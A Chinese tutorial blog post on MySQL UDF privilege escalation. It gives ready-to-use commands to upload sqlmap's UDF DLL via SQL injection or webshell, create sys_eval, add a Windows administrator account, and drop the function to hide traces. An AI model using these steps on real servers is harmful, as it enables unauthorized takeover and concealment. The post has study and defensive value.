MySQL UDF提权

最新推荐文章于 2025-04-23 01:41:01 发布
最新推荐文章于 2025-04-23 01:41:01 发布
阅读量847 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 安全 文章标签: 渗透测试 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Myu_wzy/article/details/121526141
本文详细介绍了MySQL用户自定义函数(UDF)提权的过程,包括查看plugin目录、获取并上传udf.dll文件、创建sys_eval函数、执行提权命令以及清理痕迹。提权过程中涉及的关键步骤如利用sqlmap的cloak.py解码dll文件,通过SQL注入或文件管理工具上传dll,以及使用sys_eval执行系统命令以提升权限。同时,文章列举了sqlmap中udf文件提供的几个关键函数,强调了UDF在安全方面的潜在风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

一、UDF 介绍

二、UDF提权步骤

1. 查看存放 udf.dll 的指定目录

2. 在 kali 获取 udf.dll 文件

3. 把 udf.dll 文件上传到指定目录

4. 创建用户自定义函数 sys_eval

5. 执行自定义函数 sys_eval

6. 清除痕迹

三、拓展资料

一、UDF 介绍

UDF 是 Mysql 的一个拓展接口,UDF(Userdefined function) 可翻译为用户自定义函数,是用来拓展 Mysql 的技术手段。

二、UDF提权步骤

1. 查看存放 udf.dll 的指定目录

        使用 sql 语句查看 plugin 目录

select @@plugin_dir;

show variables like 'plugin%';

该目录默认是不存在的,需要我们在 Mysql 的安装路径下创建 lib\plugin 文件夹

2. 在 kali 获取 udf.dll 文件

        使用 kali 系统中 sqlmap 自带的 cloak.py 文件,对 lib_mysqludf_sys.dll_ 文件解码。

cd /usr/share/sqlmap/extra/cloak  # 进入cloak目录
./cloak.py -d -i /usr/share/sqlmap/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ 
# 解码 lib_mysqludf_sys.dll_ 文件

        此时在 /usr/share/sqlmap/data/udf/mysql/windows/32 目录下,会生成一个 lib_mysqludf_sys.dll 文件,把该文件存在 web 中,方便提取使用。

将文件改名为 udf.dll

3. 把 udf.dll 文件上传到指定目录

        可以通过下列方法将 udf.dll 文件上传到 lib\plugin 目录

利用 sql注入 进行上传 select load_file() into dumpfile “具体路径”。

直接利用 菜刀/蚁剑 拖拽到具体目录下。

4. 创建用户自定义函数 sys_eval

create function sys_eval returns string soname 'udf.dll';
#sys_eval是函数名称,udf.dll是lib_mysqludf_sys.dll_上传后的文件名
select * from mysql.func where name = 'sys_eval';
#查看函数是否存在,验证创建

5. 执行自定义函数 sys_eval

        通过自定义函数创建用户,并将用户提升为 administrators 组的用户

select sys_eval("net user username password /add");
# 创建新用户,用户名为 username 密码为 password
select sys_eval("net localGroup administrators username /add")
# 将新用户 username 加入管理员组

6. 清除痕迹

        删除自定义函数,清除痕迹

drop function sys_eval;

三、拓展资料

sqlmap中的udf文件提供的函数:

sys_eval,执行任意命令,并将输出返回。

sys_exec,执行任意命令,并将退出码返回。

sys_get,获取一个环境变量。

sys_set,创建或修改一个环境变量。

 参考文章

MySQL UDF提权_小水池-优快云博客_udf提权

MySQLUDF
2301_76227305的博客
06-08 3003
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
MySQL——udf
hackzkaq的博客
04-11 6632
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员——逍遥子 一、前期准备 1.Mysql udf简介 MySQL udf(user definedfunction,用户定义函数),为用户供了一种高效创建函数的方式。udf函数按其运行模式可以分为单次调用型和聚集函数型两类,单次调用型函数能够针对数据库查询的每一行记录进行处理,聚集函数型用于处理Group By等聚集查询。 2.udf原理 udf的设计初衷是为了方便用户自定义一些函数,方便查询一些复杂的数据,同时也增加了使用udf的可能
MysqlUDF
最新发布
lza20001103的博客
04-23 552
MysqlUDF
MySQL UDF
small_cat's home
10-22 2058
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 一样方便。UDF 是通过这样的方法来实现获取对方主机的system的shell限,从而达到的目的。要实现 UDF 需要有一个动态链接库文件
MySQL UDF原理
weixin_45626840的博客
10-10 1173
看了许多视频和文章,对UDF讲得都不是很清楚,遂搜索了一下MySQL的基础知识,总结了一下,供各位初学的师傅参考。user-defined functions (UDFs),用户自定义函数,不过,这已经是过时的说法了,MySQL官方文档现在把它称作(可加载函数),是MySQL可在运行时加载执行以扩展功能的机制。我们大可把它理解为是一个插件,而且其本质也是一个动态链接库。官方文档很清楚地说明了,一个可加载函数会被编译为库文件(Windows下文.dll,Linux下为.so),然后使用和。
linux环境下的MySQL UDF
黑战士的博客
04-25 2400
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞的时候发现补丁全部被修补。这个时候需要利用第三方应用。当MYSQL限比较高的时候我们就可以利用udf。###利用前mysqlfuncfunc。
mysql udf文件
02-01
mysql udf文件mysql udf文件
MYSQL高版本低版本UDF工具
06-20
MYSQL高版本低版本UDF工具 很好用的UDF使用 有两个版本
Mysql-UDF
告白的博客
08-14 1912
0x00 简介 UDF介绍:User Defined Functions简称UDF,通俗来讲就是用户可自定义函数。udf就是利用到创建自定义函数(sys_eval),在mysql中调用这个自定义的函数(sys_eval)来实现获取对方主机的system的shell限,从而达到的目的。 简单来说便是利用脚本放到对方mysql指定的目录下,运用脚本创建自定义函数,使用函数即可获取shell限。 我们需要将duf.dll文件放入C:\phpStudy\MySQL\lib\plugin,前面路
mysql 5.5 udf_基础-----mysql-udf
weixin_39844267的博客
01-19 238
1.总结关于udf方法通过弱口令,爆破,网站配置文件等方式得到mysql数据库帐号密码,---还要能外连(1).udf.dll代码的16进制数声明给my_udf_a变量set @my_udf_a=concat('',dll的16进制);(2).建表my_udf_data,字段为data,类型为longblob。create table my_udf_data(data LONGBLOB);(...
Mysql - UDF介绍
Reset
08-20 646
Mysql 的 User Defined Functions(UDF)功能,允许用户扩展mysql的功能,通过编写自定义的函数,用户可以将复杂的逻辑封装成函数,然后在sql查询中直接使用。所以攻击者可能会尝试通过UDF来获取数据库的高级限,从而执行任意代码或者敏感数据。
mysql udf
weixin_44304678的博客
03-25 448
上传成功后,执行如下命令创建自定义函数。
Mysql UDF
fengling132的专栏
05-19 2141
2011-08-17 1:14 今天闲的无聊DEDECMS搞了几个站。没事做吧。真的很久很久没有玩这东西了。 测试经典的UDF.dll一次性成功。 dedecms的账号和密码都保存在data/common.inc.php里面;下载common.inc.php查看账号密码你懂的。 首先用菜刀上传UDF.php;然后输入账号密码啥的也就连接成功了。
MySQLUDF
weixin_43774222的博客
03-14 734
一、getshell 1.arp扫描,发现靶机ip arp-scan -l 2.nmap扫描靶机开放端口信息 发现80端口开放 nmap -sS -sV 172.16.12.159 3.使用dirsearch扫描目录 发现vendor、WordPress等目录 dirsearch -u 172.16.12.159 4.访问vendor发现存在目录遍历漏洞 5.查看具体文件,信息收集 对文件进行查看,发现phpmailerautoload.php目录,以及reradme.md中存在phpmai
linux——Mysql UDF
qq_55202378的博客
04-12 989
UDF:user define fucntion,在mysql中,允许用户创建自定义函数,这些函数可以在SQL查询语句中使用,通过使用UDF,用户可以对数据库执行自定义操作。:生成位置无关代码,PIC(Position independent code),这种代码可以在内存中的任何位置执行,简单查看该EXP,在利用过程中,需要登陆到mysql数据库,新建表,在表中插入编译好的共享库,gcc编译的时候,不指定相关参数,直接接源文件,可能会有各种各样的报错。:仅仅编译源代码,不进行链接,通常生成.o文件
mysql udf
03-06
MySQL UDF(User-Defined Function)是MySQL中的用户自定义函数,它允许用户通过编写自己的函数来扩展MySQL的功能。UDF可以用于实现各种自定义功能,包括是指通过某种方式获取更高限的操作。在MySQL中,如果你拥有一个低限的账户,但是想要执行高限操作,可以通过UDF来实现。 具体来说,你可以编写一个UDF函数,该函数可以执行一些需要高限才能执行的操作,比如修改系统文件、执行系统命令等。然后将该UDF函数加载到MySQL中,并使用低限账户调用该函数,从而实现操作。 需要注意的是,UDF需要满足以下条件: 1. 你需要有CREATE FUNCTION限,以创建和加载UDF函数。 2. 你需要找到一个合适的方法,并编写相应的UDF函数。 3. 你需要知道目标MySQL服务器的版本和配置,以确保你选择的方法适用于该版本和配置。 请注意,是一种潜在的安全风险行为,应该谨慎使用,并且仅在合法授的情况下进行。滥用功能可能导致系统被攻击或数据泄露等安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值